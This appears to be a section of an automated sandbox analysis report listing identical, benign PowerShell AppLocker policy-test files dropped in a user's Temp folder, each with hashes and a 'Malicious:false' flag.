                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0tr5l43.acd.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b54ungvz.fqw.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbe3en2g.hpi.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_biwkrxkp.c4x.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5pjfiyp.5xi.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fagm5ipp.5cr.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gq30w00h.b3z.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imq5g0pq.hhd.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jc0v5ugi.tpd.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l44brpxj.3di.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvdtgqkm.54d.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0osc13k.imw.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2hlp5r1.kve.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npbstxtj.cgq.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otuxuszo.00z.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxop0tqe.x3s.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyhyjbwx.k3o.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmfyzqut.zxa.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcroe1lr.4lx.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0cegv2o.hm1.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjvepcxu.vfo.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdnosrkf.l1v.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdqjoos4.kjc.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfprz31m.jnj.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzn3mnah.m2e.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbzzq4en.vsj.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wudfb3wh.eun.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0limvup.bn3.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr0nzqwr.033.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzajo4ck.a4q.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycgpqw3e.3ld.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvconnxd.ft0.ps1

                                  Download File
